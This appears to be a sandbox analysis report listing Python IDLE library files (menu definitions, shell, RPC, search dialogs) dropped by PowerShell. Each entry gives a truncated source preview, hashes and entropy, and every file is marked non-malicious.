                                                                                                    Preview:"""Define the menu contents, hotkeys, and event bindings.....There is additional configuration information in the EditorWindow class (and..subclasses): the menus are created there based on the menu_specs (class)..variable, and menus not created are silently skipped in the code here. This..makes it possible, for example, to define a Debug menu which is only present in..the PythonShell window, and a Format menu which is only present in the Editor..windows....."""..from importlib.util import find_spec....from idlelib.config import idleConf....# Warning: menudefs is altered in macosx.overrideRootMenu()..# after it is determined that an OS X Aqua Tk is in use,..# which cannot be done until after Tk() is first called...# Do not alter the 'file', 'options', or 'help' cascades here..# without altering overrideRootMenu() as well...# TODO: Make this more robust....menudefs = [.. # underscore prefixes character to underscore.. ('file', [.. ('_New File', '<<open-new-window>>'),.
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):19103
                                                                                                    Entropy (8bit):4.5570363133353435
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:/3CUKuNBAZoPRH3/PfM7xHkOobvB3/6OR3FKszk6DZQnxtQx7mxsOvoBfe:fvKuNBAeJvAn3OvKsz5F8rQKo2
                                                                                                    MD5:03BC48EA129BED89DA6F83AF1D8C82B4
                                                                                                    SHA1:D4156CA8C6AE4A453680F955239A90269800B728
                                                                                                    SHA-256:E745266A652117182F34403F0E66EF62609D9CF1A5A3896F0262B8E82201CA3E
                                                                                                    SHA-512:D2488E301DE82D53CEFDF7B40B3AC4FC07747DC05CF2C6E8AC2FC91C010BFF4344F1F087820A31A4F798F5EB4C2DF3EDACCC2E253F0D253B1FE0A4ED46494813
                                                                                                    Malicious:false
                                                                                                    Preview:"""..MultiCall - a class which inherits its methods from a Tkinter widget (Text, for..example), but enables multiple calls of functions per virtual event - all..matching events will be called, not only the most specific one. This is done..by wrapping the event functions - event_add, event_delete and event_info...MultiCall recognizes only a subset of legal event sequences. Sequences which..are not recognized are treated by the original Tk handling mechanism. A..more-specific event will be called before a less-specific event.....The recognized sequences are complete one-event sequences (no emacs-style..Ctrl-X Ctrl-C, no shortcuts like <3>), for all types of events...Key/Button Press/Release events can have modifiers...The recognized modifiers are Shift, Control, Option and Command for Mac, and..Control, Alt, Shift, Meta/M for other platforms.....For all events which were handled by MultiCall, a new member is added to the..event instance passed to the binded functions - mc_type. This is o
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):5903
                                                                                                    Entropy (8bit):4.45529508410838
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:vdJMhgVdqtDRm+23pPCexG84pKO0DOjoyFZlBDdB4ecSBb2D/g27t4SKi:ODRmvN4pKOzoyF2AaEB9i
                                                                                                    MD5:AB5FE50D5E665A8DF203CE105BCB829A
                                                                                                    SHA1:B8D5C7E39CB9A36902C472FB44C8CF7FFCD58C9D
                                                                                                    SHA-256:5D91A4B1309A8ABA993D561B5B7CD3247C1FCCA914754F0A510B56B242BC8E17
                                                                                                    SHA-512:5309B795ECB0F17CAA843E7CD108CFA8AE6AE9F1D91F237C37779250A5ADF9E29221FCA10BAF6D58AF024AEDB3DBFDCEC0AAF60277702A816CCCDFE286CFC1E0
                                                                                                    Malicious:false
                                                                                                    Preview:"""Editor window that can serve as an output file..."""....import re....from tkinter import messagebox....from idlelib.editor import EditorWindow......file_line_pats = [.. # order of patterns matters.. r'file "([^"]*)", line (\d+)',.. r'([^\s]+)\((\d+)\)',.. r'^(\s*\S.*?):\s*(\d+):', # Win filename, maybe starting with spaces.. r'([^\s]+):\s*(\d+):', # filename or path, ltrim.. r'^\s*(\S.*?):\s*(\d+):', # Win abs path with embedded spaces, ltrim..]....file_line_progs = None......def compile_progs():.. "Compile the patterns for matching to file name and line number.".. global file_line_progs.. file_line_progs = [re.compile(pat, re.IGNORECASE).. for pat in file_line_pats]......def file_line_helper(line):.. """Extract file name and line number from line of text..... Check if line of text contains one of the file/line patterns... If it does and if the file and line are valid, return.. a tuple of the file name and line numbe
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):7387
                                                                                                    Entropy (8bit):4.697039923507525
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:LZp3kqHXR0lIfcJD0PcsSAKM3g+KcYU+yn+CXlZs+l+kXlZSpWGu81EW8TFer:LzF3ulRZ0PoAKhlcBfn7VZsKFVZc1EWf
                                                                                                    MD5:A53945157002F4511A292C5FDDA5DBCB
                                                                                                    SHA1:8FB3E7630AAAA3604EF2C81DE91A1C870579F4B2
                                                                                                    SHA-256:1E79FCD497D449836554772C565CBF3F31930F8DA0DDFC499096E23A9F96A18C
                                                                                                    SHA-512:A44E0E3BDE714714A126AA5ACF2816D260E1AC920FC93AAB0F799D7B33208E9C814C75B112DB85A8DF57009F6A7FB87202506EA2D1A7DFC0824A2A19BF1AA931
                                                                                                    Malicious:false
                                                                                                    Preview:"""ParenMatch -- for parenthesis matching.....When you hit a right paren, the cursor should move briefly to the left..paren. Paren here is used generically; the matching applies to..parentheses, square brackets, and curly braces..."""..from idlelib.hyperparser import HyperParser..from idlelib.config import idleConf...._openers = {')':'(',']':'[','}':'{'}..CHECK_DELAY = 100 # milliseconds....class ParenMatch:.. """Highlight matching openers and closers, (), [], and {}..... There are three supported styles of paren matching. When a right.. paren (opener) is typed:.... opener -- highlight the matching left paren (closer);.. parens -- highlight the left and right parens (opener and closer);.. expression -- highlight the entire expression from opener to closer... (For back compatibility, 'default' is a synonym for 'opener')..... Flash-delay is the maximum milliseconds the highlighting remains... Any cursor movement (key press or click) before that removes the..
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):3200
                                                                                                    Entropy (8bit):4.420408257925926
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:0iDEavyxOWcPJ5z3aMnV4HN1VNbssC9cpIK409k/sPmY0:0iDEaqUQMnV4HE9cmKfk/sQ
                                                                                                    MD5:2A77F8AE0634D53C3E782D53FC00DE69
                                                                                                    SHA1:CAA12B3AB6028D76D02FA779562BC71693A497A4
                                                                                                    SHA-256:85CA313137A19C6F9AD57DB14EF0F002D1C298F155D566BC1AC67C12A8EBAF61
                                                                                                    SHA-512:5E72002612B709FB07916469A97FA13FEB9D8A13DA541AA00AA106A8E42249276261559C8746E7EFA4E1198DF1DD2F0F1AC692B437B8F2D047399CF7D7FB2CBD
                                                                                                    Malicious:false
                                                                                                    Preview:import importlib.machinery..import os..import sys....from idlelib.browser import ModuleBrowser, ModuleBrowserTreeItem..from idlelib.tree import TreeItem......class PathBrowser(ModuleBrowser):.... def __init__(self, master, *, _htest=False, _utest=False):.. """.. _htest - bool, change box location when running htest.. """.. self.master = master.. self._htest = _htest.. self._utest = _utest.. self.init().... def settitle(self):.. "Set window titles.".. self.top.wm_title("Path Browser").. self.top.wm_iconname("Path Browser").... def rootnode(self):.. return PathBrowserTreeItem()......class PathBrowserTreeItem(TreeItem):.... def GetText(self):.. return "sys.path".... def GetSubList(self):.. sublist = [].. for dir in sys.path:.. item = DirBrowserTreeItem(dir).. sublist.append(item).. return sublist......class DirBrowserTreeItem(TreeItem):.... def _
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):3688
                                                                                                    Entropy (8bit):4.367317003386653
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:Kb8tRuNOx5ZtLb7Hix5HZZiFKJvWuKQw4d0H:RtBLLbqHZaiKQwqI
                                                                                                    MD5:6295402C4B8B4A4A54909E4FD702D2B2
                                                                                                    SHA1:BE725BDBBA5DAB12FF014ADA034E90797A48E38B
                                                                                                    SHA-256:48B2C2718F6600CAAB78AC6D2CE5E590978F3BD591D6B32CBBD56077A53B65EF
                                                                                                    SHA-512:062AC78AC6B8CEFC4BBFADC6194416C6BE00E8624899A5144EE848CDFDEB980B696DA06B6D40A5764416875A66EB85887BE748A5801B1D1B01E98B656F242FDE
                                                                                                    Malicious:false
                                                                                                    Preview:from idlelib.delegator import Delegator..from idlelib.redirector import WidgetRedirector......class Percolator:.... def __init__(self, text):.. # XXX would be nice to inherit from Delegator.. self.text = text.. self.redir = WidgetRedirector(text).. self.top = self.bottom = Delegator(text).. self.bottom.insert = self.redir.register("insert", self.insert).. self.bottom.delete = self.redir.register("delete", self.delete).. self.filters = [].... def close(self):.. while self.top is not self.bottom:.. self.removefilter(self.top).. self.top = None.. self.bottom.setdelegate(None).. self.bottom = None.. self.redir.close().. self.redir = None.. self.text = None.... def insert(self, index, chars, tags=None):.. # Could go away if inheriting from Delegator.. self.top.insert(index, chars, tags).... def delete(self, index1, index2=None):.. # Could go away if i
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):20453
                                                                                                    Entropy (8bit):4.231412469146267
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:faCxhnXt999acUVY/9rJ34CfFOMrjF5I4XbT1VStbkby31nw7m6kHwXfDqXnzDkt:5R9CorJ3lfFOMrjF5IVtbkb7Oqfov33O
                                                                                                    MD5:F312FDACB75747F28FC1D9DDA9AF6CA4
                                                                                                    SHA1:3A55871D1F4B67BFDD5287B3514F82A4BAD40752
                                                                                                    SHA-256:2B0BD9D69CA690DB15D675A20F6A82EFE85ADEBC41D333492FD3F4E486AED9CC
                                                                                                    SHA-512:102D402B136E6563230AE917CEDF310C4CD0759E7FFCFF3EB3EFD70B97DDA58674B8F7DB72BCC02A19EC1E558A738124A79AC761262BBC4379E1A7ECB95F9187
                                                                                                    Malicious:false
                                                                                                    Preview:"""Define partial Python code Parser used by editor and hyperparser.....Instances of ParseMap are used with str.translate.....The following bound search and match functions are defined:.._synchre - start of popular statement;.._junkre - whitespace or comment line;.._match_stringre: string, possibly without closer;.._itemre - line that may have bracket structure start;.._closere - line that must be followed by dedent..._chew_ordinaryre - non-special characters..."""..import re....# Reason last statement is continued (or C_NONE if it's not)...(C_NONE, C_BACKSLASH, C_STRING_FIRST_LINE,.. C_STRING_NEXT_LINES, C_BRACKET) = range(5)....# Find what looks like the start of a popular statement....._synchre = re.compile(r""".. ^.. [ \t]*.. (?: while.. | else.. | def.. | return.. | assert.. | break.. | class.. | continue.. | elif.. | try.. | except.. | raise.. | import.. | yield.. ).. \b..""", re.VERBOSE | re.MULTILIN
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):64234
                                                                                                    Entropy (8bit):4.472710608667727
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:768:evMEFjYOjUXY18JMbXdbkByxK40E5lVkVCf:evMCjxjUI18yeBmK4JlVa4
                                                                                                    MD5:EE04B8AAB03DAF9E276568D0FC22C7DF
                                                                                                    SHA1:6AF22F219F4B9A101A3B3803AE4F9FBB64218E53
                                                                                                    SHA-256:F4D5E60768AF6543939D3C13E0D8545378263D0B67A05EE0CC4139027D3AA7E3
                                                                                                    SHA-512:6DD219519DE936D354CB0BDE0502C540E13710485EED855083F32C769D6939DD4E27EBB59E1BD04902C36D9F7CE33A0BCF6C851CD3617D0F321B3E4F449B91F0
                                                                                                    Malicious:false
                                                                                                    Preview:#! /usr/bin/env python3....import sys..if __name__ == "__main__":.. sys.modules['idlelib.pyshell'] = sys.modules['__main__']....try:.. from tkinter import *..except ImportError:.. print("** IDLE can't import Tkinter.\n".. "Your Python may not be configured for Tk. **", file=sys.__stderr__).. raise SystemExit(1)....# Valid arguments for the ...Awareness call below are defined in the following...# https://msdn.microsoft.com/en-us/library/windows/desktop/dn280512(v=vs.85).aspx..if sys.platform == 'win32':.. try:.. import ctypes.. PROCESS_SYSTEM_DPI_AWARE = 1 # Int required... ctypes.OleDLL('shcore').SetProcessDpiAwareness(PROCESS_SYSTEM_DPI_AWARE).. except (ImportError, AttributeError, OSError):.. pass....from tkinter import messagebox....from code import InteractiveInterpreter..import itertools..import linecache..import os..import os.path..from platform import python_version..import re..import socket..import subprocess..from textwra
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):15459
                                                                                                    Entropy (8bit):4.519098654032303
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:ifBWRzp6UEsUNoyNSLFYffrNf8eF077Zb2:ipijYRJF1
                                                                                                    MD5:0A18D18FF934096716E9DC8A135AB25D
                                                                                                    SHA1:3265BB99A70430F518986F2111FC34BF9290E2EB
                                                                                                    SHA-256:232CF1A09C739BF6C67C0859E2D0DE951776AFECC9DEB2863BCF4A8FC7FCB3BA
                                                                                                    SHA-512:AD37B759D3A1FBC92A81DE2751B14F34ECE2027083BA9B64FA3A7BB95F5559DA66D3498BAECB1C4987687A232F396E431DBB4280BA4C1D79FE742FA6950262A2
                                                                                                    Malicious:false
                                                                                                    Preview:"""..Dialogs that query users and verify the answer before accepting.....Query is the generic base class for a popup dialog...The user must either enter a valid answer or close the dialog...Entries are validated when <Return> is entered or [Ok] is clicked...Entries are ignored when [Cancel] or [X] are clicked...The 'return value' is .result set to either a valid answer or None.....Subclass SectionName gets a name for a new config file section...Configdialog uses it for new highlight theme and keybinding set names...Subclass ModuleName gets a name for File => Open Module...Subclass HelpSource gets menu item and path for additions to Help menu..."""..# Query and Section name result from splitting GetCfgSectionNameDialog..# of configSectionNameDialog.py (temporarily config_sec.py) into..# generic and specific parts. 3.6 only, July 2016...# ModuleName.entry_ok came from editor.EditorWindow.load_module...# HelpSource was extracted from configHelpSourceEdit.py (temporarily..# config_help.py
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):6950
                                                                                                    Entropy (8bit):4.43211367603529
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:p11bWUtOXkzVYlADrx/b99t2q8YevO+sv83LGNKnR1cn5z9xwIEpnWPgnUVgJS:p11rtOX6iAD6q8YyO7v8i0R1cnKeYnUj
                                                                                                    MD5:B965E2292C296D5C124522452F719445
                                                                                                    SHA1:5358416B15C58CF0EC3EFD238E377F7EFA4A812C
                                                                                                    SHA-256:2D439E1A431457698BF850721ADB1750FCC2B861D942E29199A38EBA310A850D
                                                                                                    SHA-512:E7A2C464045AF31B40824A51CF3541E6FA780BE95CAE5557264836BEE6631E6F6426F27D15E78C3CC2101BB374877D9CB91E29A4EA1D08A3BEFB842B2D727F93
                                                                                                    Malicious:false
                                                                                                    Preview:from tkinter import TclError....class WidgetRedirector:.. """Support for redirecting arbitrary widget subcommands..... Some Tk operations don't normally pass through tkinter. For example, if a.. character is inserted into a Text widget by pressing a key, a default Tk.. binding to the widget's 'insert' operation is activated, and the Tk library.. processes the insert without calling back into tkinter..... Although a binding to <Key> could be made via tkinter, what we really want.. to do is to hook the Tk 'insert' operation itself. For one thing, we want.. a text.insert call in idle code to have the same effect as a key press..... When a widget is instantiated, a Tcl command is created whose name is the.. same as the pathname widget._w. This command is used to invoke the various.. widget operations, e.g. insert (for a Text widget). We are going to hook.. this command and provide a facility ('register') to intercept the widget.. operation. We wil
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):10141
                                                                                                    Entropy (8bit):4.399944791237853
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:B+zn33AkCPRjcO//OAkhNg8Gh3S/G/ZiujE0/:Bq3ORjtOPN1Gtoun
                                                                                                    MD5:8150C3D49FD6093CA8C10F8550D5CE51
                                                                                                    SHA1:1AEEE3520D2A94AE8A35947C8CEE8F5F95D83A70
                                                                                                    SHA-256:7EDCEDF77869F69F2BFFF63D02FC0E2EFD2073BC902E94DFEE73112965E293AB
                                                                                                    SHA-512:3C863C0A34753EACFB780F6DA375E3DFAB892609ADC9820D1D5C53EE0A8BAA471448BE0E38AD27B18B42869E6A79E9AA1DA48853D8CDAF5D829F68C57389A56E
                                                                                                    Malicious:false
                                                                                                    Preview:"""Replace dialog for IDLE. Inherits SearchDialogBase for GUI...Uses idlelib.searchengine.SearchEngine for search capability...Defines various replace related functions like replace, replace all,..and replace+find..."""..import re..re.PatternError = re.error # New in 3.13.....from tkinter import StringVar, TclError....from idlelib.searchbase import SearchDialogBase..from idlelib import searchengine......def replace(text, insert_tags=None):.. """Create or reuse a singleton ReplaceDialog instance..... The singleton dialog saves user entries and preferences.. across instances..... Args:.. text: Text widget containing the text to be searched... """.. root = text._root().. engine = searchengine.get(root).. if not hasattr(engine, "_replacedialog"):.. engine._replacedialog = ReplaceDialog(root, engine).. dialog = engine._replacedialog.. searchphrase = text.get("sel.first", "sel.last").. dialog.open(text, searchphrase, insert_tags=insert_tags)...
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):21713
                                                                                                    Entropy (8bit):4.496308091440143
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:QLz2UIWdHJNLCezFC0wX8/lR5ATNEbOedXYncXrjb8QF/GqIP84Z8379hhZeytVg:Qp9wMUNz2P0a79NF+9/CCKEMY
                                                                                                    MD5:7386FC887A451A60093A6F4499ADF42C
                                                                                                    SHA1:F07B1080A0E97F784885B369D05F9D7540BDC575
                                                                                                    SHA-256:E61EE58F3E64BFCA03C3A3D07E0DCFDCC84507A51E2B6E8B1842C3E3D8C276A3
                                                                                                    SHA-512:455BEE15FA660E615E88E4F7D40C3B141A77F46100089D4307B61B31E4B21EBF4391FDC5C448181D2C4D3C1A63D6209E1215A2F9B40E78C882AC12EABBD4A1AB
                                                                                                    Malicious:false
                                                                                                    Preview:"""RPC Implementation, originally written for the Python Idle IDE....For security reasons, GvR requested that Idle's Python execution server process..connect to the Idle process, which listens for the connection. Since Idle has..only one client per server, this was not a limitation..... +---------------------------------+ +-------------+.. | socketserver.BaseRequestHandler | | SocketIO |.. +---------------------------------+ +-------------+.. ^ | register() |.. | | unregister()|.. | +-------------+.. | ^ ^.. | | |.. | + -------------------+ |.. | | |.. +-------------------------+ +-----------------+.. | RPCHandler | | RPCClient |.. | [attribute of RPCServer]| | |.. +---
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):22105
                                                                                                    Entropy (8bit):4.572434221436679
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:QTD9g4tGMCb73QmXs8ya31SOKS2p7uu/avh:QTDKMSU4supYK
                                                                                                    MD5:8131EDF9CD0101A63B97A9E3AA8E2BA9
                                                                                                    SHA1:C5F2D3321E179199FDF57AEBA19B776A0E6EDAF0
                                                                                                    SHA-256:5D444E2D2F5E44885B0FDC1CA0BDFEE7D11DA67BC5E0E466C4C58830D840990D
                                                                                                    SHA-512:0C6C85742504C7B9C2AA1826E92F052492D0317DF46DBDBA2E15F8D3984FC2BBB012EAAF9BAB594C8C6A69633DAEFAD69EC8E199C1303CAD86A45F22ECDBFE49
                                                                                                    Malicious:false
                                                                                                    Preview:""" idlelib.run....Simplified, pyshell.ModifiedInterpreter spawns a subprocess with..f'''{sys.executable} -c "__import__('idlelib.run').run.main()"'''..'.run' is needed because __import__ returns idlelib, not idlelib.run..."""..import contextlib..import functools..import io..import linecache..import queue..import sys..import textwrap..import time..import traceback..import _thread as thread..import threading..import warnings....import idlelib # testing..from idlelib import autocomplete # AutoComplete, fetch_encodings..from idlelib import calltip # Calltip..from idlelib import debugger_r # start_debugger..from idlelib import debugobj_r # remote_object_tree_item..from idlelib import iomenu # encoding..from idlelib import rpc # multiple objects..from idlelib import stackviewer # StackTreeItem..import __main__....import tkinter # Use tcl and, if startup fails, messagebox...if not hasattr(sys.modules['idlelib.run'], 'firstrun'):.. # Undo modifications of tkinter by idlelib import
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):8486
                                                                                                    Entropy (8bit):4.394526090381391
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:PyoUT6GKOmvyk4vwuHSNiBcKOl6cjNQUm1qp2Y:qN+td4RSwu6U3
                                                                                                    MD5:B770323D46AF21C55FE741147CE92510
                                                                                                    SHA1:9EE736BD76735A70E555DE02C4E56C30647B04BD
                                                                                                    SHA-256:20189DFB2029E2BB18C89A374A4157C36467D4C254B8E0BE4DAA8D9031506E39
                                                                                                    SHA-512:DBA9393AE268ACE758123D3C5B73F56DEF05416AF890FCE0A9EE4902ABD63C5F448A6C8B47FF5A96789DA16807C56F70313E887723437C71CFF92355303EE24B
                                                                                                    Malicious:false
                                                                                                    Preview:"""Execute code from an editor.....Check module: do a full syntax check of the current module...Also run the tabnanny to catch any inconsistent tabs.....Run module: also execute the module's code in the __main__ namespace...The window must have been saved previously. The module is added to..sys.modules, and is also added to the __main__ namespace.....TODO: Specify command line arguments in a dialog box..."""..import os..import tabnanny..import time..import tokenize....from tkinter import messagebox....from idlelib.config import idleConf..from idlelib import macosx..from idlelib import pyshell..from idlelib.query import CustomRun..from idlelib import outwin....indent_message = """Error: Inconsistent indentation detected!....1) Your indentation is outright incorrect (easy to fix), OR....2) Your indentation mixes tabs and spaces.....To fix case 2, change all tabs to spaces by using Edit->Select All followed \..by Format->Untabify Region and specify the number of columns used by each tab..
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):4629
                                                                                                    Entropy (8bit):4.518983528010594
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:oHualFNKnJO79LVHHsy66HEDdve3poL3DdQu9aMsjdnjrt:dgBLVHHsy66H4dG3KL3DSu9aMeRjx
                                                                                                    MD5:0D6835A9F5421BABC50B534F2210AFC5
                                                                                                    SHA1:0F606707C3977EEC4F28A70657955D3AC164C5F2
                                                                                                    SHA-256:4C69E4D4A4D334F4EB941F683C7482DB67CC11B431AF6E255D0AF30F5BD76690
                                                                                                    SHA-512:C43359BC5A8F18E64A32A3D4891F5911F7D4C577B6ABBC528B1C3A122B1DD558B8D79976D6B44F5E919DF1EF2AFD1CE4399398AAA347A571B5D0435BFDDC3D74
                                                                                                    Malicious:false
                                                                                                    Preview:from tkinter import *..from tkinter.ttk import Frame, Scrollbar....from idlelib import macosx......class ScrolledList:.... default = "(None)".... def __init__(self, master, **options):.. # Create top frame, with scrollbar and listbox.. self.master = master.. self.frame = frame = Frame(master).. self.frame.pack(fill="both", expand=1).. self.vbar = vbar = Scrollbar(frame, name="vbar").. self.vbar.pack(side="right", fill="y").. self.listbox = listbox = Listbox(frame, exportselection=0,.. background="white").. if options:.. listbox.configure(options).. listbox.pack(expand=1, fill="both").. # Tie listbox and scrollbar together.. vbar["command"] = listbox.yview.. listbox["yscrollcommand"] = vbar.set.. # Bind events to the list box.. listbox.bind("<ButtonRelease-1>", self.click_event).. listbox.bind("<Double-ButtonRelease-1>", self.double_click_event).. i
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):5732
                                                                                                    Entropy (8bit):4.455142183667095
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:z6ymYZM53WMCH56KJUcRvWwVRLgKSRUGReo7kYVJwu+P/J6NFAB3Au+km47ybTh:OsM3WMkgRcRewVR5SRUToY7/oFAFADSk
                                                                                                    MD5:78333A636269433F67D680C0103CA4CD
                                                                                                    SHA1:B24F9DA07506F12AE2760AC8B361375E584FD085
                                                                                                    SHA-256:D335B363C13AC46A0DB6E836A1F2522C0AFABCB143C7CBF5920D66C8642936C6
                                                                                                    SHA-512:99847DBD688300170A88A75EBA15E8269CE84837371E3A77E728E2CA746E992F7C53E00405704E683FE188A765B11D7E3B03D1FCF805B9F307F82853EEABA8E3
                                                                                                    Malicious:false
                                                                                                    Preview:"""Search dialog for Find, Find Again, and Find Selection.. functionality..... Inherits from SearchDialogBase for GUI and uses searchengine.. to prepare search pattern..."""..from tkinter import TclError....from idlelib import searchengine..from idlelib.searchbase import SearchDialogBase....def _setup(text):.. """Return the new or existing singleton SearchDialog instance..... The singleton dialog saves user entries and preferences.. across instances..... Args:.. text: Text widget containing the text to be searched... """.. root = text._root().. engine = searchengine.get(root).. if not hasattr(engine, "_searchdialog"):.. engine._searchdialog = SearchDialog(root, engine).. return engine._searchdialog....def find(text):.. """Open the search dialog..... Module-level function to access the singleton SearchDialog.. instance and open the dialog. If text is selected, it is.. used as the search phrase; otherwise, the previous entry..
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):8066
                                                                                                    Entropy (8bit):4.572939815710139
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:6LqBb6fcgH4kkWU+AH0shFwJhZafEyGberC:IqwfBZkTzHxhFwPIfEyG6e
                                                                                                    MD5:BD72F06AE14B226D4983C0E3BEB8E6E5
                                                                                                    SHA1:5FEF42A2D7591D1D1E9B36BDCDC75A33359B1DB3
                                                                                                    SHA-256:A1EDEA131EBDCDE39C640487822D5509165089BA322B33EE568AC1F3C049BA90
                                                                                                    SHA-512:46F3AAE69FA5A5FC06CBB232E7199A371426067079D4FC274FE1BDBD6483E1254462D2CCAB787B51BAFB46B1DD65177941D7C2BFC5A52D1D995CA16560181976
                                                                                                    Malicious:false
                                                                                                    Preview:'''Define SearchDialogBase used by Search, Replace, and Grep dialogs.'''....from tkinter import Toplevel..from tkinter.ttk import Frame, Entry, Label, Button, Checkbutton, Radiobutton..from tkinter.simpledialog import _setup_dialog......class SearchDialogBase:.. '''Create most of a 3 or 4 row, 3 column search dialog..... The left and wide middle column contain:.. 1 or 2 labeled text entry lines (make_entry, create_entries);.. a row of standard Checkbuttons (make_frame, create_option_buttons),.. each of which corresponds to a search engine Variable;.. a row of dialog-specific Check/Radiobuttons (create_other_buttons)..... The narrow right column contains command buttons.. (make_button, create_command_buttons)... These are bound to functions that execute the command..... Except for command buttons, this base class is not limited to items.. common to all three subclasses. Rather, it is the Find dialog minus.. the "Find Next" command, its execution func
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):7650
                                                                                                    Entropy (8bit):4.291873346315346
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:wvD2MsspKaToFzSWXuPWwyidF4yeLU2OKPTQy9y:U4akte6inI0v
                                                                                                    MD5:AD093E3E382FEB49C54C51570B778B36
                                                                                                    SHA1:E44BDA2C07177763A11EEFE0132F7A562B994D9B
                                                                                                    SHA-256:7188F8116170DC003A2C16003E3C12424A6FAC06E048757CFEB8B5FF41ACA661
                                                                                                    SHA-512:70AC84D52FC01AEE3306DEBA3B508B56A341428BACF70AB1B459785587F3DEE129D2DDC153D11048722E48C9B6A633D6D00477F800C42E42622BED0ADF0D47F7
                                                                                                    Malicious:false
                                                                                                    Preview:'''Define SearchEngine for search dialogs.'''..import re..re.PatternError = re.error # New in 3.13.....from tkinter import StringVar, BooleanVar, TclError..from tkinter import messagebox....def get(root):.. '''Return the singleton SearchEngine instance for the process..... The single SearchEngine saves settings between dialog instances... If there is not a SearchEngine already, make one... '''.. if not hasattr(root, "_searchengine"):.. root._searchengine = SearchEngine(root).. # This creates a cycle that persists until root is deleted... return root._searchengine......class SearchEngine:.. """Handles searching a text widget for Find, Replace, and Grep.""".... def __init__(self, root):.. '''Initialize Variables that save search state..... The dialogs bind these to the UI elements present in the dialogs... '''.. self.root = root # need for report_error().. self.patvar = StringVar(root, '') # search pattern..
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):20882
                                                                                                    Entropy (8bit):4.5536257788045225
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:6xWWNImtWCZ3XoVP0zUBXIPbPveTumxOh28GOk3dd:SKcOPiS4PbPyumgIVT3P
                                                                                                    MD5:267FED045E6C6E38C86E7DDC00E4C91E
                                                                                                    SHA1:F5C7B0E700BEBF06731AF5ABD386D8A2980701E4
                                                                                                    SHA-256:FE752E047D588E54F67E1A2B30AEC32AA8BF70242437F496AFB131BAF86C31DE
